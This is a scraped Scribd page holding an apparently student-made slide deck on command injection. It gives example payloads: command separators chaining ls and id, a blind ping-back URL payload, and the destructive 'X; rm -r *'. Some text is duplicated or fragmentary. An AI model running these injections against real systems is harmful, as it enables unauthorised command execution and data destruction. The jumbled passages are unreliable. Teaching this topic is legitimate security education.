Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
8 views7 pages

Command Injection

Uploaded by

فرح احمد مصطفي عناني ١٩١٠٣٧٨٧
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
8 views7 pages

Command Injection

Uploaded by

فرح احمد مصطفي عناني ١٩١٠٣٧٨٧
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 7

Command Injections

Result-Based Command Injection

• In result-based command injection, the result shows the command's output


directly, which means the user can directly see the outcome of the arbitrary
command that he wrote in the response.

• Example: In the submission of file, you can see the input you submitted returned
back to you. Now if you delete it; the following will happen
ERROR WHEN CREATING A FILE? WHY?

Let's check whether it has command injection or not


by entering an OS command a; ls; in the input. This
would not show any effect in the response but would
also not throw an error. And now we know that it
allows a Let's check whether it has command
injection or not by entering an OS command a; ls; in
the input. This would not show any effect in the
response but would also not throw an error. And now
we know that it allows a semicolon.
• /?search=

• Payload:
Blind Command http://www.mytarget.com/?search=%00{.exec|ping
<MyIP>

Injection • Mitigation:never call out to OS commands from


application-layer code. (Use Regex)
Result-Based Command Injection
• Commands that can cause harm X; rm -r *

• #Both Unix and Windows supported

• ls||id; ls ||id; ls|| id; ls || id # Execute both

• ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)

• ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok

• ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of
the 2º

• ls %0A id # %0A Execute both (RECOMMENDED)


ATTACK(CHANGING PASSWORDS AND
USERNAMES)
Images as png.txt: File corruption(Man in the
Middle)

You might also like